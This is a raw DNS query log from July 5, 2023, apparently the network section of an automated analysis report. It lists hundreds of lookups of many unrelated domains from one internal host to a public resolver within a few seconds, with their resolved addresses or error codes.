                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.281014919 CEST8.8.8.8192.168.2.60xb1c9No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.307904005 CEST8.8.8.8192.168.2.60x4aa9No error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.314337969 CEST8.8.8.8192.168.2.60x12aName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.345180988 CEST8.8.8.8192.168.2.60x1697No error (0)roewer.de45.142.176.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.355875015 CEST8.8.8.8192.168.2.60xc1beName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.356219053 CEST8.8.8.8192.168.2.60x8ea5No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.373491049 CEST8.8.8.8192.168.2.60xc0d5No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.425287008 CEST8.8.8.8192.168.2.60x49d2No error (0)bible.org172.67.33.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.425287008 CEST8.8.8.8192.168.2.60x49d2No error (0)bible.org104.20.54.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.425287008 CEST8.8.8.8192.168.2.60x49d2No error (0)bible.org104.20.55.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.442204952 CEST8.8.8.8192.168.2.60xb2c2No error (0)uster.com172.67.32.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.442204952 CEST8.8.8.8192.168.2.60xb2c2No error (0)uster.com104.20.221.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.442204952 CEST8.8.8.8192.168.2.60xb2c2No error (0)uster.com104.20.220.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.479537964 CEST8.8.8.8192.168.2.60x19bbNo error (0)enguita.net195.5.116.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.496741056 CEST8.8.8.8192.168.2.60x1df2No error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.523633957 CEST8.8.8.8192.168.2.60xcf56No error (0)lyto.net188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.523633957 CEST8.8.8.8192.168.2.60xcf56No error (0)lyto.net188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.550908089 CEST8.8.8.8192.168.2.60x62c6No error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.576380968 CEST8.8.8.8192.168.2.60x8651No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.576380968 CEST8.8.8.8192.168.2.60x8651No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.576380968 CEST8.8.8.8192.168.2.60x8651No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.576380968 CEST8.8.8.8192.168.2.60x8651No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.579886913 CEST8.8.8.8192.168.2.60xef3cNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.587779045 CEST8.8.8.8192.168.2.60xdb3eNo error (0)xinhui.net43.255.29.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.589873075 CEST8.8.8.8192.168.2.60x13e8No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.590936899 CEST8.8.8.8192.168.2.60x23d2No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.590936899 CEST8.8.8.8192.168.2.60x23d2No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.591830015 CEST8.8.8.8192.168.2.60x4edfNo error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.606693983 CEST8.8.8.8192.168.2.60xbee5No error (0)biurohera.pl79.96.161.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.606693983 CEST8.8.8.8192.168.2.60xbee5No error (0)biurohera.pl54.36.175.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.608288050 CEST8.8.8.8192.168.2.60xedebNo error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.612248898 CEST8.8.8.8192.168.2.60xc7eeNo error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.614172935 CEST8.8.8.8192.168.2.60x4828No error (0)ludomemo.com27.0.174.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.619013071 CEST8.8.8.8192.168.2.60x912cNo error (0)cpmteam.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.619013071 CEST8.8.8.8192.168.2.60x912cNo error (0)cpmteam.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.656611919 CEST8.8.8.8192.168.2.60xe247No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.682873964 CEST8.8.8.8192.168.2.60xe500No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.689920902 CEST8.8.8.8192.168.2.60x7d81Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.722213984 CEST8.8.8.8192.168.2.60x300Server failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.743484974 CEST8.8.8.8192.168.2.60xbf26No error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.744492054 CEST8.8.8.8192.168.2.60xb0f3No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.744492054 CEST8.8.8.8192.168.2.60xb0f3No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.757663012 CEST8.8.8.8192.168.2.60x8d21No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.796075106 CEST8.8.8.8192.168.2.60xe3bdNo error (0)web-york.com219.94.129.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.841517925 CEST8.8.8.8192.168.2.60xf692No error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.876854897 CEST8.8.8.8192.168.2.60x1930Server failure (2)com-edit.frnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.885343075 CEST8.8.8.8192.168.2.60xf12bNo error (0)cubodown.com104.21.30.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.885343075 CEST8.8.8.8192.168.2.60xf12bNo error (0)cubodown.com172.67.150.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.892597914 CEST8.8.8.8192.168.2.60x13ddNo error (0)oaith.ca192.124.249.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.894282103 CEST8.8.8.8192.168.2.60x1d53No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.894933939 CEST8.8.8.8192.168.2.60x3a4aServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.918409109 CEST8.8.8.8192.168.2.60xbc1Server failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.940710068 CEST8.8.8.8192.168.2.60x8be8Server failure (2)cjcagent.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:49.966866016 CEST8.8.8.8192.168.2.60x2e89No error (0)yasuma.com61.200.81.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.095438004 CEST8.8.8.8192.168.2.60x159bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.115005970 CEST8.8.8.8192.168.2.60x96b9No error (0)oozkranj.com212.44.102.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.220520020 CEST8.8.8.8192.168.2.60x374dNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.222039938 CEST8.8.8.8192.168.2.60x22cServer failure (2)avc.com.sanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.233074903 CEST8.8.8.8192.168.2.60x86f5No error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.295790911 CEST8.8.8.8192.168.2.60x6e40No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.302551985 CEST8.8.8.8192.168.2.60x5125Server failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.481156111 CEST8.8.8.8192.168.2.60x9a0aNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.481156111 CEST8.8.8.8192.168.2.60x9a0aNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.587142944 CEST8.8.8.8192.168.2.60xa835No error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.587142944 CEST8.8.8.8192.168.2.60xa835No error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.629796982 CEST8.8.8.8192.168.2.60x7177Server failure (2)awal.wsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.719885111 CEST8.8.8.8192.168.2.60x78bdNo error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.731245041 CEST8.8.8.8192.168.2.60xa00No error (0)apcotex.com35.154.163.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.817447901 CEST8.8.8.8192.168.2.60xc4f8No error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.817637920 CEST8.8.8.8192.168.2.60xea30No error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.837713957 CEST8.8.8.8192.168.2.60xcb9dNo error (0)shztm.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.850097895 CEST8.8.8.8192.168.2.60xc7c5No error (0)shenhgts.net199.59.243.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.869096041 CEST8.8.8.8192.168.2.60x13e8Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.903414965 CEST8.8.8.8192.168.2.60x7d81Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.941695929 CEST8.8.8.8192.168.2.60xf54dNo error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.953845978 CEST8.8.8.8192.168.2.60x7fe3No error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.967164993 CEST8.8.8.8192.168.2.60x73c6No error (0)dspears.comtraff-3.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.967164993 CEST8.8.8.8192.168.2.60x73c6No error (0)traff-3.hugedomains.comhdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.967164993 CEST8.8.8.8192.168.2.60x73c6No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.18.7.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:50.967164993 CEST8.8.8.8192.168.2.60x73c6No error (0)hdr-nlb4-0bbd2e21834cb637.elb.us-east-2.amazonaws.com3.19.116.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.058589935 CEST8.8.8.8192.168.2.60x6dd4No error (0)alexpope.biz76.74.184.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.076909065 CEST8.8.8.8192.168.2.60x86f5Server failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.091156960 CEST8.8.8.8192.168.2.60xe580Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.159331083 CEST8.8.8.8192.168.2.60xbc1Server failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.343081951 CEST8.8.8.8192.168.2.60x82f4No error (0)jnf.at136.243.147.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.460726976 CEST8.8.8.8192.168.2.60x5adcNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.480865955 CEST8.8.8.8192.168.2.60x6d75No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.484186888 CEST8.8.8.8192.168.2.60x6f23No error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.528378963 CEST8.8.8.8192.168.2.60x3b24No error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.542037964 CEST8.8.8.8192.168.2.60x4398Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.542645931 CEST8.8.8.8192.168.2.60x7d76No error (0)assideum.com52.219.110.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.544012070 CEST8.8.8.8192.168.2.60xe37fNo error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.544012070 CEST8.8.8.8192.168.2.60xe37fNo error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.548300982 CEST8.8.8.8192.168.2.60x1940No error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.566628933 CEST8.8.8.8192.168.2.60xc80bNo error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.634573936 CEST8.8.8.8192.168.2.60x7177Server failure (2)awal.wsnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.692471981 CEST8.8.8.8192.168.2.60xb7e3Server failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.701894045 CEST8.8.8.8192.168.2.60xdb25Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.758285046 CEST8.8.8.8192.168.2.60x8d6eNo error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:51.964808941 CEST8.8.8.8192.168.2.60x7d81Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:52.043946028 CEST8.8.8.8192.168.2.60x271eServer failure (2)someikan.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:52.105452061 CEST8.8.8.8192.168.2.60x86f5Server failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:52.113142014 CEST8.8.8.8192.168.2.60x159bServer failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:52.340046883 CEST8.8.8.8192.168.2.60x5125Server failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:52.630542040 CEST8.8.8.8192.168.2.60xe500Server failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:52.724970102 CEST8.8.8.8192.168.2.60xb7e3Server failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.028399944 CEST8.8.8.8192.168.2.60xfaf8No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.033703089 CEST8.8.8.8192.168.2.60x48e4No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.033703089 CEST8.8.8.8192.168.2.60x48e4No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.039599895 CEST8.8.8.8192.168.2.60xcba7No error (0)dyag-eng.com13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.039599895 CEST8.8.8.8192.168.2.60xcba7No error (0)dyag-eng.com76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.079788923 CEST8.8.8.8192.168.2.60x978aNo error (0)mkm-gr.com79.124.76.247A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.090171099 CEST8.8.8.8192.168.2.60x3d05No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.127912998 CEST8.8.8.8192.168.2.60xa68dNo error (0)nels.co.uk5.134.13.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.142055035 CEST8.8.8.8192.168.2.60x374dServer failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.147943974 CEST8.8.8.8192.168.2.60x5414No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.151228905 CEST8.8.8.8192.168.2.60xad47No error (0)vfcindia.com103.191.209.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.152575016 CEST8.8.8.8192.168.2.60x86f5Server failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.300234079 CEST8.8.8.8192.168.2.60x9a15No error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.300234079 CEST8.8.8.8192.168.2.60x9a15No error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.301821947 CEST8.8.8.8192.168.2.60x40baNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.307202101 CEST8.8.8.8192.168.2.60x1210No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.309612036 CEST8.8.8.8192.168.2.60x650dServer failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.358288050 CEST8.8.8.8192.168.2.60x7844No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.358288050 CEST8.8.8.8192.168.2.60x7844No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.369657040 CEST8.8.8.8192.168.2.60x9af6No error (0)yhsll.com102.134.49.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.381444931 CEST8.8.8.8192.168.2.60x409Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.388706923 CEST8.8.8.8192.168.2.60x974No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.616328001 CEST8.8.8.8192.168.2.60x6a79No error (0)kursavto.ru31.177.80.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.616328001 CEST8.8.8.8192.168.2.60x6a79No error (0)kursavto.ru31.177.76.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.620696068 CEST8.8.8.8192.168.2.60xd3f1No error (0)duiops.net135.125.108.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.678414106 CEST8.8.8.8192.168.2.60xe500Server failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.761193991 CEST8.8.8.8192.168.2.60xb7e3Server failure (2)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:53.978576899 CEST8.8.8.8192.168.2.60x7d81Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.155314922 CEST8.8.8.8192.168.2.60x374dServer failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.178738117 CEST8.8.8.8192.168.2.60xbc1Server failure (2)htsmx.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.485918045 CEST8.8.8.8192.168.2.60x347aNo error (0)linac.co.uk23.236.62.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.706260920 CEST8.8.8.8192.168.2.60x9941Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.721779108 CEST8.8.8.8192.168.2.60x79c0Server failure (2)clysma.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.735869884 CEST8.8.8.8192.168.2.60x5b2No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.763017893 CEST8.8.8.8192.168.2.60x6102No error (0)ncn.de46.30.60.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.766145945 CEST8.8.8.8192.168.2.60xec9No error (0)infotech.pl79.96.32.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.772927999 CEST8.8.8.8192.168.2.60xb074No error (0)sanfotek.net216.69.141.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.774244070 CEST8.8.8.8192.168.2.60x61abNo error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.774378061 CEST8.8.8.8192.168.2.60xcc9bNo error (0)ftmobile.com199.34.228.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.827399015 CEST8.8.8.8192.168.2.60xa955No error (0)gcss.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.827399015 CEST8.8.8.8192.168.2.60xa955No error (0)gcss.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.834619999 CEST8.8.8.8192.168.2.60xe355No error (0)akdeniz.nl109.71.54.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.858520031 CEST8.8.8.8192.168.2.60x9c72No error (0)epc.com.au103.4.16.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.876851082 CEST8.8.8.8192.168.2.60xc09No error (0)leapc.com35.231.13.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.880362034 CEST8.8.8.8192.168.2.60x7093No error (0)webways.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.880362034 CEST8.8.8.8192.168.2.60x7093No error (0)webways.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:54.883492947 CEST8.8.8.8192.168.2.60x8b2cNo error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.086287022 CEST8.8.8.8192.168.2.60x5d51No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.096214056 CEST8.8.8.8192.168.2.60x8a6aNo error (0)tozzhin.com202.94.166.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.098365068 CEST8.8.8.8192.168.2.60xf11fName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.109071970 CEST8.8.8.8192.168.2.60x33b0No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.111666918 CEST8.8.8.8192.168.2.60xc121Name error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.192471981 CEST8.8.8.8192.168.2.60x87acName error (3)cpwpb.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.306235075 CEST8.8.8.8192.168.2.60x2ffName error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.338799953 CEST8.8.8.8192.168.2.60xb24cServer failure (2)ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                          Jul 5, 2023 08:07:55.391397953 CEST8.8.8.8192.168.2.60x32c6No error (0)midap.com198.49.23.144A (IP address)IN (0x0001)false
